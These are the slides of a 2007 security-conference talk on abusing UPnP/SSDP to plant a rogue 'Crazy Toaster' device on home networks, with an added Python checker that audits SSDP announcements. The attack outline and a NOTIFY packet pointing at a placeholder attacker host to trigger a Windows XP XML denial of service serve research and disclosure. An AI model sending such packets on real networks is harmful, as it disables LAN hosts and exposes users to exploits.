"A Crazy Toaster: Can Home Devices turn against us?"
Dror Shalev, SmartDefense Research Center, [email_address]
ClubHack, 9/12/2007, Pune, India (India's own International Hackers Convention)
 
Agenda
- Introduction
- Trust, technology and new privacy issues
- Overview of home networking and early threats
- Steps to create a Crazy Toaster Trojan
- Demonstration
- Side effect: Windows XP SSDP distributed DoS
- Side effect demonstration
- TODO, extended ideas
- iPhone, iToaster & others (ClubHack edition)
- Respect
- Q&A
Introduction
Introduction
- Mission: world domination via a single UDP packet
- Do we care if our home toaster sees us naked?
- Can home devices turn against us and spy on our network?
- Privacy and trust issues raised by technology, new hardware and cool devices
Trust, technology & privacy issues
Common privacy issues:
- Technology is about to replace the trust model we use today
- People get confused between people that know things and machines that know things
- Do we care if Google's machines know that we would like to pay for porn? Can this information be given to a human?
Trust models:
- Usually we don't trust a human 100% to be able to deal with his knowledge about us
- Should we trust corporations like Google?
- Should we trust hardware and software vendors?
Overview of home networking
- Home networking in Windows XP and in Windows Vista
- Peer-to-peer networking of PCs, networked appliances and wireless devices
- UPnP architecture: overview of a distributed, open architecture based on TCP/IP, UDP and HTTP
- IPv6: reintroduces old exploits (land attack, MS06-064)
- Security exploits and early threats
Overview of home networking
- In Vista's Network Explorer (the replacement for XP's Network Neighborhood), devices are discovered using Function Discovery
- Function Discovery can find devices using much more efficient, diverse and robust protocols than were available in XP's Network Neighborhood
- These protocols include NetBIOS, UPnP/SSDP, and Web Services Discovery (WSD)
Overview of home networking: home networking in Windows Vista
- Windows Peer-to-Peer Networking
- People Near Me (PNM)
- Network discovery
- Media sharing
Overview of home networking
Overview of home networking (diagram; labelled nodes: Wireless Connectivity, Wireless Access Point, Low-end Appliance, VoIP, Webpage with virus, Cell phone, Crazy Toaster, Media Center, Hacker)
Universal Plug and Play (UPnP)
The UPnP architecture is a distributed, open networking architecture that leverages TCP/IP and the Web to enable seamless proximity networking, in addition to control and data transfer among networked devices in the home, office, and everywhere in between.
What are the benefits of UPnP technology?
- Media and device independence: UPnP technology can run on any network technology including Wi-Fi, coax, phone line, power line, Ethernet and 1394.
- Platform independence: vendors can use any operating system and any programming language to build UPnP products.
- Internet-based technologies: UPnP technology is built upon IP, TCP, UDP, HTTP, and XML, among others.
- UI control: UPnP architecture enables vendor control over device user interface and interaction using the browser.
- Programmatic control: UPnP architecture enables conventional application programmatic control.
- Common base protocols: vendors agree on base protocol sets on a per-device basis.
- Extendable: each UPnP product can have value-added services layered on top of the basic device architecture by the individual manufacturers.
UPnP, IGDs, SSDP on XP
- UPnP is a collection of standards and protocols that permits Windows to provide discovery and interoperability between a wide variety of Universal Plug and Play network devices
- When connected to a network, UPnP devices immediately provide their services and use other services on the network
- Such devices may include anything from standard computing equipment to kitchen appliances and home entertainment systems
- By default, the UPnP client is not installed
- The Internet Gateway Device Discovery and Control Client permits Windows to detect and interact with Internet gateway devices (IGDs)
- IGDs include routers and computers running Internet Connection Sharing. Such devices can support detection by either UPnP or the Internet Gateway Device Discovery and Control Client
- IGD devices use the Simple Service Discovery Protocol (SSDP) to broadcast their availability on the network. This permits clients to automatically locate the IGD device and use it as their default gateway for external network access
- By default, the Internet Gateway Device Discovery and Control Client is installed
Simple Service Discovery Protocol (SSDP): retrieving device and service descriptions
- On a default XP installation, no support is added for device control, as would be the case in an installation of UPnP from "Network Services"
- Although Microsoft added default support for an "InternetGatewayDevice", that was added to aid leading network hardware manufacturers in making UPnP-enabled "gateway devices"
(diagram: Desktop, Wireless Access Point)
Early threats

Vulnerability                                                              | Date       | Severity | Credit
---------------------------------------------------------------------------|------------|----------|------------------------
Apple Mac OS X mDNSResponder Remote Buffer Overflow                        | 2007-05-24 | High     | Michael Lynn, Juniper
Microsoft Windows UPnP Remote Stack Buffer Overflow [MS07-019]             | 2007-04-10 | Critical | Greg MacManus, iDefense
Linksys WRT54GX V2.0 WAN Port UPnP                                         | 2006-10-11 | Mid      | Armijn Hemel
Multiple D-Link Routers UPnP Buffer Overflow                               | 2006-07-24 | High     | Barnaby Jack, eEye
Microsoft Windows Plug and Play Vulnerability / Zotob worm [MS05-039]      | 2005-08-05 | Critical | Neel Mehta, ISS X-Force
Belkin 54G Wireless Router Multiple Vulnerabilities                        | 2005-03-17 | Mid      | pureone
Multiple Linksys Routers Gozila.CGI Denial of Service                      | 2004-06-02 | Mid      | Alan McCaig, b0f
Xavi DSL Router UPnP Long Request Denial of Service                        | 2003-07-22 | Mid      | David F. Madrid
Netgear FM114P ProSafe Wireless Router Rule Bypass                         | 2003-04-02 | High     | Björn Stickler
Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure         | 2003-04-02 | Mid      | Björn Stickler
Netgear FM114P Wireless Firewall File Disclosure                           | 2003-02-09 | Mid      | Björn Stickler
Multiple Linksys Devices strcat() Buffer Overflow                          | 2002-12-02 | High     | Gerardo Richarte, CORE
Linksys Router Unauthorized Management Access                              | 2002-11-17 | Mid      | Seth Bromberger
Microsoft UPnP NOTIFY Buffer Overflow [MS01-059]                           | 2001-12-19 | Critical | Riley Hassell, eEye
Microsoft Universal Plug and Play Simple Service Discovery Protocol DoS    | 2001-12-19 | Mid      | Riley Hassell, eEye
Microsoft UPnP Denial of Service                                           | 2001-10-31 | Low      | 'Ken' from FTU
Windows ME Simple Service Discovery Protocol Denial of Service             | 2001-10-17 | Mid      | milo omega
Steps to create a Crazy Toaster Trojan
- While researching SSDP & UPnP we realized that the protocols allow not only routers, media players, servers and other devices to connect seamlessly, but attackers too
- A scenario of a "Crazy Toaster", a Trojan device or software with TCP/IP capabilities (like routers, media players, access points) that joins a local area network and becomes a security hazard, is possible
Steps to create a Crazy Toaster Trojan
Recipe: building your own Trojan
Needed ingredients:
- Toaster
- Hardware: any or none
- Software: select a UPnP stack vendor sample (Intel, Siemens)
- Network access to the victim's network (worm victim, multicast, social engineering, physical access)
Problems:
- Heat
- Porting from Linux to Nokia IPSO
- Shipping
Steps to create a Crazy Toaster Trojan
- Our Crazy Toaster will advertise its presence on the victim's local network
- Trojan discovery process uses HTTPU (HTTP over UDP) and HTTPMU (HTTP over UDP multicast) to 239.255.255.250:1900, sending HTTP packets to multiple (multicast) systems over UDP
- Social engineering: declare itself as anything from standard computing equipment to kitchen appliances and home entertainment systems
- Presentation web server: JavaScript, Ajax & browser bugs
- Use known techniques & exploits from the wild (MPack)
- Retrieve attack payload from remote host
Steps to create a Crazy Toaster Trojan
Demonstration
- Physical run of "Crazy Toaster" Trojan attack
- Physical run of advanced attack vectors: discovery, presentation, social engineering, browser exploits
- Nokia IPSO 6 hardware, POSIX / Win SDK
(demo: Crazy Toaster)
Windows XP SSDP distributed DoS
Side effect: Windows XP Simple Service Discovery Protocol Distributed Denial of Service Vulnerability
- A single multicast UDP packet causes XP victims to parse a well-formed XML document: a recursive logic bomb
- Memory consumption, 100% CPU on the entire LAN segment, virtual memory page file going crazy
- Can be done via software (spyware, worm)
- Distributed damage and possible attack vectors: a remote attacker that resides on the LAN segment connected to the affected appliance/Trojan may exploit this vulnerability to deny service for all legitimate LAN users
* MS will fix this in Service Pack 3 for XP
Windows XP SSDP distributed DoS
    NOTIFY * HTTP/1.1
    HOST: 239.255.255.250:1900
    CACHE-CONTROL: max-age=9
    LOCATION: http://AttackerInLanHost/upnp/trojan/ilya.xml
    NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1
    NTS: ssdp:alive
    SERVER: Drors/2005 UPnP/1.0 SVCHostDLLkiller/1.1
    USN: uuid:CrazyToasterByDrorRespect2eEye
(diagram: Xml Kill, Crazy Toaster, Victim)
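The discovery step and the NOTIFY above are what a LAN monitor actually sees, so here is a sanity checker for SSDP announcements on the 239.255.255.250:1900 group: an added example, not code from the talk. It assumes a known gateway address (KNOWN_GATEWAY_IP) and a SERVER allow-list (KNOWN_SERVER_TOKENS) that a defender would fill in from their own device inventory; the benign datagram is constructed, the rogue one is the slide's announcement re-typed.

```python
"""Sanity-check SSDP NOTIFY announcements seen on the multicast group and
report why an announcement deserves distrust (added example, not the talk's code)."""
import ipaddress
import re
from urllib.parse import urlsplit

SSDP_GROUP = "239.255.255.250:1900"
KNOWN_GATEWAY_IP = "192.168.1.1"          # assumed: the one real IGD on this segment
KNOWN_SERVER_TOKENS = (                   # assumed: SERVER strings of inventoried devices
    "Linux/2.4 UPnP/1.0",
    "Microsoft-Windows-NT/5.1 UPnP/1.0",
)
REQUIRED = ("HOST", "NT", "NTS", "USN", "LOCATION", "CACHE-CONTROL", "SERVER")
NT_RE = re.compile(r"^(upnp:rootdevice|uuid:\S+|urn:\S+:(device|service):\S+:\d+)$")


def parse_notify(datagram: str) -> dict:
    """Split a raw NOTIFY datagram into a header dict (names upper-cased,
    since SSDP header names are case-insensitive)."""
    lines = datagram.replace("\r\n", "\n").split("\n")
    if not lines[0].startswith("NOTIFY * HTTP/1.1"):
        raise ValueError("not an SSDP NOTIFY request")
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                          # blank line terminates the headers
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line {line!r}")
        headers[name.strip().upper()] = value.strip()
    return headers


def audit_notify(datagram: str, sender_ip: str) -> list:
    """Return a list of findings; empty means the announcement is well formed
    and consistent with what we expect on this LAN segment."""
    try:
        h = parse_notify(datagram)
    except ValueError as exc:
        return [f"unparseable: {exc}"]
    findings = [f"missing header {n}" for n in REQUIRED if n not in h]
    if h.get("HOST") != SSDP_GROUP:
        findings.append(f"HOST {h.get('HOST')!r} is not the SSDP group")
    nt, usn = h.get("NT", ""), h.get("USN", "")
    if not NT_RE.match(nt):
        findings.append(f"NT {nt!r} is not a valid notification type")
    elif not nt.startswith("uuid:") and not usn.endswith("::" + nt):
        findings.append("USN does not end with '::' + NT as UPnP requires")
    if h.get("NTS") not in ("ssdp:alive", "ssdp:byebye"):
        findings.append(f"unknown NTS {h.get('NTS')!r}")
    if not re.fullmatch(r"max-age\s*=\s*\d+", h.get("CACHE-CONTROL", "")):
        findings.append("CACHE-CONTROL is not max-age=<seconds>")
    loc = urlsplit(h.get("LOCATION", ""))
    if loc.scheme != "http" or not loc.hostname:
        findings.append("LOCATION is not an http URL")
    else:
        try:                               # description URL should point back at the sender
            if str(ipaddress.ip_address(loc.hostname)) != sender_ip:
                findings.append(f"LOCATION host {loc.hostname} != sender {sender_ip}")
        except ValueError:
            findings.append(f"LOCATION uses a hostname ({loc.hostname}), not the sender IP")
    if "InternetGatewayDevice" in nt and sender_ip != KNOWN_GATEWAY_IP:
        findings.append(f"{sender_ip} claims to be an Internet gateway")
    if not any(tok in h.get("SERVER", "") for tok in KNOWN_SERVER_TOKENS):
        findings.append(f"unrecognised SERVER {h.get('SERVER')!r}")
    return findings


# Constructed: what the real gateway on this segment announces.
BENIGN = (
    "NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nCACHE-CONTROL: max-age=1800\r\n"
    "LOCATION: http://192.168.1.1:5431/dyndev/uuid:0011-2233\r\n"
    "NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    "NTS: ssdp:alive\r\nSERVER: Linux/2.4 UPnP/1.0 BRCM400/1.0\r\n"
    "USN: uuid:0011-2233::urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n"
)
# The announcement from the slide above, with its placeholder LOCATION host.
ROGUE = (
    "NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nCACHE-CONTROL: max-age=9\r\n"
    "LOCATION: http://AttackerInLanHost/upnp/trojan/ilya.xml\r\n"
    "NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    "NTS: ssdp:alive\r\nSERVER: Drors/2005 UPnP/1.0 SVCHostDLLkiller/1.1\r\n"
    "USN: uuid:CrazyToasterByDrorRespect2eEye\r\n\r\n"
)

if __name__ == "__main__":
    print("gateway:", audit_notify(BENIGN, "192.168.1.1") or "OK")
    print("toaster:", audit_notify(ROGUE, "192.168.1.77") or "OK")
```

Against the slide's packet the checker reports four findings (second-sender IGD claim, hostname LOCATION, USN inconsistent with NT, unknown SERVER), which is the kind of announcement that should never be followed with a description fetch.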
Side effect demonstration
- Kitchen appliance in a smart home becomes crazy
- Physical run of the Windows XP Simple Service Discovery Protocol Distributed Denial of Service Vulnerability
- Logic bomb discovery in a wired or wireless local network
(demo: Kill xml)
Conclusions
- Cheap hardware appliances open a door for "bad guys"
- Wireless hardware & IPv6 open a new ball game
- Trust no one (hardware & software vendors, free gifts)
- Home devices can be targets of remote attacks (buffer overflows, CSRF, XSS)
- The SSDP Discovery Service and Universal Plug and Play Host service should both be set to disabled
- In Vista, disable 'Network discovery'
- Can home devices turn against us? Oh yeah, home devices are as bad as their software authors
TODO, extended ideas
- ARP poisoning, kernel bugs
- Wireless hacking, WEP cracking
- Linux embedded systems, MIPS
- Cell phone hacking, GPS, iPhone
- Media centers, game consoles
- DivX worm, copyrights bomb
- Record sound, IP hidden cam
- IPv6
iPhone, iToaster & others
- Apple's iPhone is fine hardware (Wi-Fi, GSM, linux): ARM-based processor, with iPhone's version of OS X
- Porting from Linux to OS X / FreeBSD, jailbreak firmware 1.0.2
- Bonjour, mDNSResponder, UDP port 5353 Multicast DNS
(demo: iDemo)
Respect
- ClubHack: India's own International Hackers' Convention
- UPnP™ Forum
- HackTheToaster.com
- eEye
- Project Cowbird: $30, 30 Minutes, 30 Networks
- Exploiting embedded systems, Barnaby Jack
- UPnP stack vendors: Intel UPnP, CyberLink, Siemens AG
- OSGi Alliance
- Dog's Toaster
- Defcon 9 UPnP Hacks
Q&A
Q: Why hack a toaster?
A: Why not?
* Slides, Toaster and iToaster source code: http://www.drorshalev.com/dev/upnp/
